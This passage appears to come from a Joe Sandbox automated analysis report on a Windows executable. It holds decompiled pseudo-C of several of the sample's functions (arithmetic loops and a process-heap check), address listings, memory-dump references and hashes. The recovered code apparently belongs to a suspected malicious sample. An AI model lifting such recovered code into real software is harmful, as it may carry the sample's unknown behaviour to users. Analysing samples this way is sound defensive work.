                                                                                                                                                                                                                                                                  												__eflags = _t448;
                                                                                                                                                                                                                                                                  												_v584 = _t448;
                                                                                                                                                                                                                                                                  											}
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										_t445 = _v24 + 1;
                                                                                                                                                                                                                                                                  										__eflags = _t445;
                                                                                                                                                                                                                                                                  										_v24 = _t445;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									_v12 = _v28 - 1;
                                                                                                                                                                                                                                                                  									while(1) {
                                                                                                                                                                                                                                                                  										__eflags = _v12;
                                                                                                                                                                                                                                                                  										if(_v12 <= 0) {
                                                                                                                                                                                                                                                                  											break;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										__eflags = _v584 & 0x00000001;
                                                                                                                                                                                                                                                                  										if((_v584 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                  											_v12 = _v12 - 1;
                                                                                                                                                                                                                                                                  											_t441 = _v584 >> 1;
                                                                                                                                                                                                                                                                  											__eflags = _t441;
                                                                                                                                                                                                                                                                  											_v584 = _t441;
                                                                                                                                                                                                                                                                  											continue;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										break;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									_t377 = _v584 >> 1;
                                                                                                                                                                                                                                                                  									__eflags = _t377;
                                                                                                                                                                                                                                                                  									_v36 = _t377;
                                                                                                                                                                                                                                                                  									goto L49;
                                                                                                                                                                                                                                                                  								} else {
                                                                                                                                                                                                                                                                  									goto L28;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								do {
                                                                                                                                                                                                                                                                  									L28:
                                                                                                                                                                                                                                                                  									E00401F80(_v48, _v16, _a20);
                                                                                                                                                                                                                                                                  									E00401BD0(__eflags, _v52, _v16, _v48, _a20 << 1, _a16, _a20);
                                                                                                                                                                                                                                                                  									_t471 = _t471 + 0x24;
                                                                                                                                                                                                                                                                  									__eflags = 0;
                                                                                                                                                                                                                                                                  								} while (0 != 0);
                                                                                                                                                                                                                                                                  								goto L29;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							__eflags = _v8;
                                                                                                                                                                                                                                                                  							if(_v8 == 0) {
                                                                                                                                                                                                                                                                  								L67:
                                                                                                                                                                                                                                                                  								E00402310(_a4, _a4, _v16, _a20);
                                                                                                                                                                                                                                                                  								_t472 = _t471 + 0xc;
                                                                                                                                                                                                                                                                  								do {
                                                                                                                                                                                                                                                                  									__eflags = _v16;
                                                                                                                                                                                                                                                                  									if(_v16 != 0) {
                                                                                                                                                                                                                                                                  										E00402350(_v16, _v44);
                                                                                                                                                                                                                                                                  										_t472 = _t472 + 8;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									E00401430( &_v16);
                                                                                                                                                                                                                                                                  									_t472 = _t472 + 4;
                                                                                                                                                                                                                                                                  									__eflags = 0;
                                                                                                                                                                                                                                                                  								} while (0 != 0);
                                                                                                                                                                                                                                                                  								do {
                                                                                                                                                                                                                                                                  									__eflags = _v20;
                                                                                                                                                                                                                                                                  									if(_v20 != 0) {
                                                                                                                                                                                                                                                                  										E00402350(_v20, _v44);
                                                                                                                                                                                                                                                                  										_t472 = _t472 + 8;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									E00401430( &_v20);
                                                                                                                                                                                                                                                                  									_t472 = _t472 + 4;
                                                                                                                                                                                                                                                                  									__eflags = 0;
                                                                                                                                                                                                                                                                  								} while (0 != 0);
                                                                                                                                                                                                                                                                  								do {
                                                                                                                                                                                                                                                                  									__eflags = _v48;
                                                                                                                                                                                                                                                                  									if(_v48 != 0) {
                                                                                                                                                                                                                                                                  										E00402350(_v48, _v44);
                                                                                                                                                                                                                                                                  										_t472 = _t472 + 8;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									E00401430( &_v48);
                                                                                                                                                                                                                                                                  									_t472 = _t472 + 4;
                                                                                                                                                                                                                                                                  									__eflags = 0;
                                                                                                                                                                                                                                                                  								} while (0 != 0);
                                                                                                                                                                                                                                                                  								do {
                                                                                                                                                                                                                                                                  									__eflags = _v52;
                                                                                                                                                                                                                                                                  									if(_v52 != 0) {
                                                                                                                                                                                                                                                                  										E00402350(_v52, _v44);
                                                                                                                                                                                                                                                                  										_t472 = _t472 + 8;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									E00401430( &_v52);
                                                                                                                                                                                                                                                                  									_t472 = _t472 + 4;
                                                                                                                                                                                                                                                                  									__eflags = 0;
                                                                                                                                                                                                                                                                  								} while (0 != 0);
                                                                                                                                                                                                                                                                  								_v24 = 1;
                                                                                                                                                                                                                                                                  								while(1) {
                                                                                                                                                                                                                                                                  									__eflags = _v24 - _v64;
                                                                                                                                                                                                                                                                  									if(_v24 >= _v64) {
                                                                                                                                                                                                                                                                  										break;
                                                                                                                                                                                                                                                                  									} else {
                                                                                                                                                                                                                                                                  										goto L83;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									do {
                                                                                                                                                                                                                                                                  										L83:
                                                                                                                                                                                                                                                                  										_t416 = _v24;
                                                                                                                                                                                                                                                                  										__eflags =  *(_t463 + _t416 * 4 - 0x240);
                                                                                                                                                                                                                                                                  										if( *(_t463 + _t416 * 4 - 0x240) != 0) {
                                                                                                                                                                                                                                                                  											E00402350( *((intOrPtr*)(_t463 + _v24 * 4 - 0x240)), _v44);
                                                                                                                                                                                                                                                                  											_t472 = _t472 + 8;
                                                                                                                                                                                                                                                                  										}
                                                                                                                                                                                                                                                                  										E00401430(_t463 + _v24 * 4 - 0x240);
                                                                                                                                                                                                                                                                  										_t472 = _t472 + 4;
                                                                                                                                                                                                                                                                  										__eflags = 0;
                                                                                                                                                                                                                                                                  									} while (0 != 0);
                                                                                                                                                                                                                                                                  									_t282 = _v24 + 1;
                                                                                                                                                                                                                                                                  									__eflags = _t282;
                                                                                                                                                                                                                                                                  									_v24 = _t282;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								__eflags = 0;
                                                                                                                                                                                                                                                                  								return 0;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							__eflags = _v56;
                                                                                                                                                                                                                                                                  							if(_v56 == 0) {
                                                                                                                                                                                                                                                                  								do {
                                                                                                                                                                                                                                                                  									E00401960(_v48,  *((intOrPtr*)(_t463 + _v36 * 4 - 0x240)), _v16, _a20);
                                                                                                                                                                                                                                                                  									E00401BD0(__eflags, _v52, _v16, _v48, _a20 << 1, _a16, _a20);
                                                                                                                                                                                                                                                                  									_t471 = _t471 + 0x28;
                                                                                                                                                                                                                                                                  									__eflags = 0;
                                                                                                                                                                                                                                                                  								} while (0 != 0);
                                                                                                                                                                                                                                                                  								goto L67;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							E00402310(_v16, _v16,  *((intOrPtr*)(_t463 + _v36 * 4 - 0x240)), _a20);
                                                                                                                                                                                                                                                                  							_t471 = _t471 + 0xc;
                                                                                                                                                                                                                                                                  							_v56 = 0;
                                                                                                                                                                                                                                                                  							goto L67;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						return E00402A00(__eflags, _a4, _a8, _a12, _a16, _a20);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					E00402880(_a4, _a8, _a20, _a16, _a20);
                                                                                                                                                                                                                                                                  					return 1;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				E00402390(_t341, _a4, 1, _a20);
                                                                                                                                                                                                                                                                  				return 1;
                                                                                                                                                                                                                                                                  			}

















































                                                                                                                                                                                                                                                                  0x00402e9d
                                                                                                                                                                                                                                                                  0x00402ea1
                                                                                                                                                                                                                                                                  0x00402ea6
                                                                                                                                                                                                                                                                  0x00402ea9
                                                                                                                                                                                                                                                                  0x00402eb6
                                                                                                                                                                                                                                                                  0x00402ed4
                                                                                                                                                                                                                                                                  0x00402edb
                                                                                                                                                                                                                                                                  0x00402f03
                                                                                                                                                                                                                                                                  0x00402f15
                                                                                                                                                                                                                                                                  0x00402f15
                                                                                                                                                                                                                                                                  0x00402f19
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00402f1b
                                                                                                                                                                                                                                                                  0x00402f1f
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00402f21
                                                                                                                                                                                                                                                                  0x00402f2b
                                                                                                                                                                                                                                                                  0x00402f31
                                                                                                                                                                                                                                                                  0x00402f0f
                                                                                                                                                                                                                                                                  0x00402f0f
                                                                                                                                                                                                                                                                  0x00402f12
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00402f12
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00402f33
                                                                                                                                                                                                                                                                  0x00402f37
                                                                                                                                                                                                                                                                  0x00402f3b
                                                                                                                                                                                                                                                                  0x00402f63
                                                                                                                                                                                                                                                                  0x00402f72
                                                                                                                                                                                                                                                                  0x00402f81
                                                                                                                                                                                                                                                                  0x00402f90
                                                                                                                                                                                                                                                                  0x00402f9f
                                                                                                                                                                                                                                                                  0x00402fa5
                                                                                                                                                                                                                                                                  0x00402fc5
                                                                                                                                                                                                                                                                  0x00402fca
                                                                                                                                                                                                                                                                  0x00402fda
                                                                                                                                                                                                                                                                  0x00402fdd
                                                                                                                                                                                                                                                                  0x00402fef
                                                                                                                                                                                                                                                                  0x00402fef
                                                                                                                                                                                                                                                                  0x00402ff2
                                                                                                                                                                                                                                                                  0x00402ff5
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040300a
                                                                                                                                                                                                                                                                  0x0040302b
                                                                                                                                                                                                                                                                  0x00403030
                                                                                                                                                                                                                                                                  0x00403033
                                                                                                                                                                                                                                                                  0x0040304a
                                                                                                                                                                                                                                                                  0x00403073
                                                                                                                                                                                                                                                                  0x00403078
                                                                                                                                                                                                                                                                  0x0040307b
                                                                                                                                                                                                                                                                  0x0040307b
                                                                                                                                                                                                                                                                  0x00402fe9
                                                                                                                                                                                                                                                                  0x00402fe9
                                                                                                                                                                                                                                                                  0x00402fec
                                                                                                                                                                                                                                                                  0x00402fec
                                                                                                                                                                                                                                                                  0x00403084
                                                                                                                                                                                                                                                                  0x00403093
                                                                                                                                                                                                                                                                  0x00403098
                                                                                                                                                                                                                                                                  0x0040309b
                                                                                                                                                                                                                                                                  0x004030a1
                                                                                                                                                                                                                                                                  0x004030b2
                                                                                                                                                                                                                                                                  0x004030b2
                                                                                                                                                                                                                                                                  0x004030b6
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004030b8
                                                                                                                                                                                                                                                                  0x004030be
                                                                                                                                                                                                                                                                  0x004030c5
                                                                                                                                                                                                                                                                  0x004030c8
                                                                                                                                                                                                                                                                  0x004030ad
                                                                                                                                                                                                                                                                  0x004030ad
                                                                                                                                                                                                                                                                  0x004030af
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004030af
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004030ca
                                                                                                                                                                                                                                                                  0x004030ce
                                                                                                                                                                                                                                                                  0x004030d5
                                                                                                                                                                                                                                                                  0x004030dc
                                                                                                                                                                                                                                                                  0x004030e3
                                                                                                                                                                                                                                                                  0x004030e3
                                                                                                                                                                                                                                                                  0x004030ea
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004030f0
                                                                                                                                                                                                                                                                  0x004030f4
                                                                                                                                                                                                                                                                  0x00403130
                                                                                                                                                                                                                                                                  0x00403130
                                                                                                                                                                                                                                                                  0x00403134
                                                                                                                                                                                                                                                                  0x00403229
                                                                                                                                                                                                                                                                  0x0040322d
                                                                                                                                                                                                                                                                  0x00403232
                                                                                                                                                                                                                                                                  0x00403232
                                                                                                                                                                                                                                                                  0x00403235
                                                                                                                                                                                                                                                                  0x00403235
                                                                                                                                                                                                                                                                  0x00403238
                                                                                                                                                                                                                                                                  0x00403238
                                                                                                                                                                                                                                                                  0x0040323c
                                                                                                                                                                                                                                                                  0x004032c5
                                                                                                                                                                                                                                                                  0x004032c5
                                                                                                                                                                                                                                                                  0x004032c5
                                                                                                                                                                                                                                                                  0x004032c9
                                                                                                                                                                                                                                                                  0x004032e6
                                                                                                                                                                                                                                                                  0x004032e6
                                                                                                                                                                                                                                                                  0x004032e8
                                                                                                                                                                                                                                                                  0x004032cb
                                                                                                                                                                                                                                                                  0x004032cb
                                                                                                                                                                                                                                                                  0x004032db
                                                                                                                                                                                                                                                                  0x004032db
                                                                                                                                                                                                                                                                  0x004032eb
                                                                                                                                                                                                                                                                  0x004032eb
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004032ef
                                                                                                                                                                                                                                                                  0x00403242
                                                                                                                                                                                                                                                                  0x00403246
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00403248
                                                                                                                                                                                                                                                                  0x0040324c
                                                                                                                                                                                                                                                                  0x00403272
                                                                                                                                                                                                                                                                  0x00403289
                                                                                                                                                                                                                                                                  0x004032ab
                                                                                                                                                                                                                                                                  0x004032b0
                                                                                                                                                                                                                                                                  0x004032b3
                                                                                                                                                                                                                                                                  0x004032b3
                                                                                                                                                                                                                                                                  0x004032b7
                                                                                                                                                                                                                                                                  0x004032b7
                                                                                                                                                                                                                                                                  0x004032be
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004032be
                                                                                                                                                                                                                                                                  0x00403261
                                                                                                                                                                                                                                                                  0x00403266
                                                                                                                                                                                                                                                                  0x00403269
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00403269
                                                                                                                                                                                                                                                                  0x0040313a
                                                                                                                                                                                                                                                                  0x00403140
                                                                                                                                                                                                                                                                  0x00403147
                                                                                                                                                                                                                                                                  0x0040314a
                                                                                                                                                                                                                                                                  0x00403227
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00403227
                                                                                                                                                                                                                                                                  0x00403150
                                                                                                                                                                                                                                                                  0x0040315a
                                                                                                                                                                                                                                                                  0x00403163
                                                                                                                                                                                                                                                                  0x00403166
                                                                                                                                                                                                                                                                  0x00403170
                                                                                                                                                                                                                                                                  0x00403182
                                                                                                                                                                                                                                                                  0x00403188
                                                                                                                                                                                                                                                                  0x0040318b
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040318d
                                                                                                                                                                                                                                                                  0x0040318d
                                                                                                                                                                                                                                                                  0x0040318d
                                                                                                                                                                                                                                                                  0x00403191
                                                                                                                                                                                                                                                                  0x004031a8
                                                                                                                                                                                                                                                                  0x004031a8
                                                                                                                                                                                                                                                                  0x004031aa
                                                                                                                                                                                                                                                                  0x00403193
                                                                                                                                                                                                                                                                  0x00403193
                                                                                                                                                                                                                                                                  0x004031a0
                                                                                                                                                                                                                                                                  0x004031a0
                                                                                                                                                                                                                                                                  0x004031ad
                                                                                                                                                                                                                                                                  0x004031ad
                                                                                                                                                                                                                                                                  0x004031b9
                                                                                                                                                                                                                                                                  0x004031bf
                                                                                                                                                                                                                                                                  0x004031c3
                                                                                                                                                                                                                                                                  0x004031c5
                                                                                                                                                                                                                                                                  0x004031c8
                                                                                                                                                                                                                                                                  0x004031cf
                                                                                                                                                                                                                                                                  0x004031d2
                                                                                                                                                                                                                                                                  0x004031da
                                                                                                                                                                                                                                                                  0x004031da
                                                                                                                                                                                                                                                                  0x004031dd
                                                                                                                                                                                                                                                                  0x004031dd
                                                                                                                                                                                                                                                                  0x004031d2
                                                                                                                                                                                                                                                                  0x0040317c
                                                                                                                                                                                                                                                                  0x0040317c
                                                                                                                                                                                                                                                                  0x0040317f
                                                                                                                                                                                                                                                                  0x0040317f
                                                                                                                                                                                                                                                                  0x004031eb
                                                                                                                                                                                                                                                                  0x00403207
                                                                                                                                                                                                                                                                  0x00403207
                                                                                                                                                                                                                                                                  0x0040320b
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00403213
                                                                                                                                                                                                                                                                  0x00403216
                                                                                                                                                                                                                                                                  0x004031f6
                                                                                                                                                                                                                                                                  0x004031ff
                                                                                                                                                                                                                                                                  0x004031ff
                                                                                                                                                                                                                                                                  0x00403201
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00403201
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00403218
                                                                                                                                                                                                                                                                  0x00403222
                                                                                                                                                                                                                                                                  0x00403222
                                                                                                                                                                                                                                                                  0x00403224
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004030f6
                                                                                                                                                                                                                                                                  0x004030f6
                                                                                                                                                                                                                                                                  0x00403102
                                                                                                                                                                                                                                                                  0x00403124
                                                                                                                                                                                                                                                                  0x00403129
                                                                                                                                                                                                                                                                  0x0040312c
                                                                                                                                                                                                                                                                  0x0040312c
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004030f6
                                                                                                                                                                                                                                                                  0x004032f4
                                                                                                                                                                                                                                                                  0x004032f8
                                                                                                                                                                                                                                                                  0x00403369
                                                                                                                                                                                                                                                                  0x00403375
                                                                                                                                                                                                                                                                  0x0040337a
                                                                                                                                                                                                                                                                  0x0040337d
                                                                                                                                                                                                                                                                  0x0040337d
                                                                                                                                                                                                                                                                  0x00403381
                                                                                                                                                                                                                                                                  0x0040338b
                                                                                                                                                                                                                                                                  0x00403390
                                                                                                                                                                                                                                                                  0x00403390
                                                                                                                                                                                                                                                                  0x00403397
                                                                                                                                                                                                                                                                  0x0040339c
                                                                                                                                                                                                                                                                  0x0040339f
                                                                                                                                                                                                                                                                  0x0040339f
                                                                                                                                                                                                                                                                  0x004033a3
                                                                                                                                                                                                                                                                  0x004033a3
                                                                                                                                                                                                                                                                  0x004033a7
                                                                                                                                                                                                                                                                  0x004033b1
                                                                                                                                                                                                                                                                  0x004033b6
                                                                                                                                                                                                                                                                  0x004033b6
                                                                                                                                                                                                                                                                  0x004033bd
                                                                                                                                                                                                                                                                  0x004033c2
                                                                                                                                                                                                                                                                  0x004033c5
                                                                                                                                                                                                                                                                  0x004033c5
                                                                                                                                                                                                                                                                  0x004033c9
                                                                                                                                                                                                                                                                  0x004033c9
                                                                                                                                                                                                                                                                  0x004033cd
                                                                                                                                                                                                                                                                  0x004033d7
                                                                                                                                                                                                                                                                  0x004033dc
                                                                                                                                                                                                                                                                  0x004033dc
                                                                                                                                                                                                                                                                  0x004033e3
                                                                                                                                                                                                                                                                  0x004033e8
                                                                                                                                                                                                                                                                  0x004033eb
                                                                                                                                                                                                                                                                  0x004033eb
                                                                                                                                                                                                                                                                  0x004033ef
                                                                                                                                                                                                                                                                  0x004033ef
                                                                                                                                                                                                                                                                  0x004033f3
                                                                                                                                                                                                                                                                  0x004033fd
                                                                                                                                                                                                                                                                  0x00403402
                                                                                                                                                                                                                                                                  0x00403402
                                                                                                                                                                                                                                                                  0x00403409
                                                                                                                                                                                                                                                                  0x0040340e
                                                                                                                                                                                                                                                                  0x00403411
                                                                                                                                                                                                                                                                  0x00403411
                                                                                                                                                                                                                                                                  0x00403415
                                                                                                                                                                                                                                                                  0x00403427
                                                                                                                                                                                                                                                                  0x0040342a
                                                                                                                                                                                                                                                                  0x0040342d
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040342f
                                                                                                                                                                                                                                                                  0x0040342f
                                                                                                                                                                                                                                                                  0x0040342f
                                                                                                                                                                                                                                                                  0x00403432
                                                                                                                                                                                                                                                                  0x0040343a
                                                                                                                                                                                                                                                                  0x0040344b
                                                                                                                                                                                                                                                                  0x00403450
                                                                                                                                                                                                                                                                  0x00403450
                                                                                                                                                                                                                                                                  0x0040345e
                                                                                                                                                                                                                                                                  0x00403463
                                                                                                                                                                                                                                                                  0x00403466
                                                                                                                                                                                                                                                                  0x00403466
                                                                                                                                                                                                                                                                  0x00403421
                                                                                                                                                                                                                                                                  0x00403421
                                                                                                                                                                                                                                                                  0x00403424
                                                                                                                                                                                                                                                                  0x00403424
                                                                                                                                                                                                                                                                  0x0040346c
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040346c
                                                                                                                                                                                                                                                                  0x004032fa
                                                                                                                                                                                                                                                                  0x004032fe
                                                                                                                                                                                                                                                                  0x00403324
                                                                                                                                                                                                                                                                  0x0040333b
                                                                                                                                                                                                                                                                  0x0040335d
                                                                                                                                                                                                                                                                  0x00403362
                                                                                                                                                                                                                                                                  0x00403365
                                                                                                                                                                                                                                                                  0x00403365
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00403324
                                                                                                                                                                                                                                                                  0x00403313
                                                                                                                                                                                                                                                                  0x00403318
                                                                                                                                                                                                                                                                  0x0040331b
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040331b
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00402f56
                                                                                                                                                                                                                                                                  0x00402ef1
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00402ef9
                                                                                                                                                                                                                                                                  0x00402ec2
                                                                                                                                                                                                                                                                  0x00000000

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 0-3916222277
                                                                                                                                                                                                                                                                  • Opcode ID: f886ec9793e0ef66c7acffb801fb739c81fdcba944f7cf57031eb0afc6e12ef9
                                                                                                                                                                                                                                                                  • Instruction ID: 184d3c76258738284dedf7c1d618d2129b6cd800847f943dec3695e966d61be0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f886ec9793e0ef66c7acffb801fb739c81fdcba944f7cf57031eb0afc6e12ef9
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 20124EB1D001099BCF14DF98D985AEFB7B9BB88305F14816DF909B7380D739AA41CBA5
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E00408650(intOrPtr _a4) {
                                                                                                                                                                                                                                                                  				void* _v1028;
                                                                                                                                                                                                                                                                  				long _v1032;
                                                                                                                                                                                                                                                                  				char _v1033;
                                                                                                                                                                                                                                                                  				signed int _v1040;
                                                                                                                                                                                                                                                                  				void* _t26;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v1033 = 0;
                                                                                                                                                                                                                                                                  				_v1032 = GetProcessHeaps(0xff,  &_v1028);
                                                                                                                                                                                                                                                                  				if(_v1032 != 0 && _v1032 < 0x100) {
                                                                                                                                                                                                                                                                  					_v1040 = 0;
                                                                                                                                                                                                                                                                  					while(_v1040 < _v1032) {
                                                                                                                                                                                                                                                                  						if( *((intOrPtr*)(_t26 + _v1040 * 4 - 0x400)) != _a4) {
                                                                                                                                                                                                                                                                  							_v1040 = _v1040 + 1;
                                                                                                                                                                                                                                                                  							continue;
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							_v1033 = 1;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						goto L8;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				L8:
                                                                                                                                                                                                                                                                  				return _v1033;
                                                                                                                                                                                                                                                                  			}








                                                                                                                                                                                                                                                                  0x00408659
                                                                                                                                                                                                                                                                  0x00408672
                                                                                                                                                                                                                                                                  0x0040867f
                                                                                                                                                                                                                                                                  0x0040868d
                                                                                                                                                                                                                                                                  0x004086a8
                                                                                                                                                                                                                                                                  0x004086c6
                                                                                                                                                                                                                                                                  0x004086a2
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004086c8
                                                                                                                                                                                                                                                                  0x004086c8
                                                                                                                                                                                                                                                                  0x004086c8
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004086c6
                                                                                                                                                                                                                                                                  0x004086a8
                                                                                                                                                                                                                                                                  0x004086d3
                                                                                                                                                                                                                                                                  0x004086dc

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetProcessHeaps.KERNEL32(000000FF,?), ref: 0040866C
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: HeapsProcess
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1420622215-0
                                                                                                                                                                                                                                                                  • Opcode ID: 206b4cadfff8224aa563270a3ad5ab10d717eaf75aa0fd3b98c60cf8bc22901b
                                                                                                                                                                                                                                                                  • Instruction ID: f196a082d41bdbefa88dc2067026a4d2e06921666e0d6015a79887bf37e5a51b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 206b4cadfff8224aa563270a3ad5ab10d717eaf75aa0fd3b98c60cf8bc22901b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2501DAB0D04218CBDB208B14DA847AAB774AB45304F1185EAD74976381D6791E8A8F5E
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                                                                                                                                                  			E00408CC0(signed int __edx, intOrPtr _a4, signed int _a8, signed int* _a12) {
                                                                                                                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                                                                                                                  				signed int _v12;
                                                                                                                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                                                                                                                  				signed int _v20;
                                                                                                                                                                                                                                                                  				intOrPtr _v24;
                                                                                                                                                                                                                                                                  				signed char* _v28;
                                                                                                                                                                                                                                                                  				intOrPtr _v32;
                                                                                                                                                                                                                                                                  				signed int _v36;
                                                                                                                                                                                                                                                                  				signed int _v40;
                                                                                                                                                                                                                                                                  				intOrPtr _v44;
                                                                                                                                                                                                                                                                  				signed int _v48;
                                                                                                                                                                                                                                                                  				signed int _v52;
                                                                                                                                                                                                                                                                  				signed int _v56;
                                                                                                                                                                                                                                                                  				intOrPtr _v60;
                                                                                                                                                                                                                                                                  				intOrPtr _v64;
                                                                                                                                                                                                                                                                  				signed int _v68;
                                                                                                                                                                                                                                                                  				signed int _v72;
                                                                                                                                                                                                                                                                  				signed int _v76;
                                                                                                                                                                                                                                                                  				signed int _v80;
                                                                                                                                                                                                                                                                  				signed int _v84;
                                                                                                                                                                                                                                                                  				signed int _v88;
                                                                                                                                                                                                                                                                  				signed int _v92;
                                                                                                                                                                                                                                                                  				signed int _v96;
                                                                                                                                                                                                                                                                  				signed int _t306;
                                                                                                                                                                                                                                                                  				signed int _t336;
                                                                                                                                                                                                                                                                  				void* _t502;
                                                                                                                                                                                                                                                                  
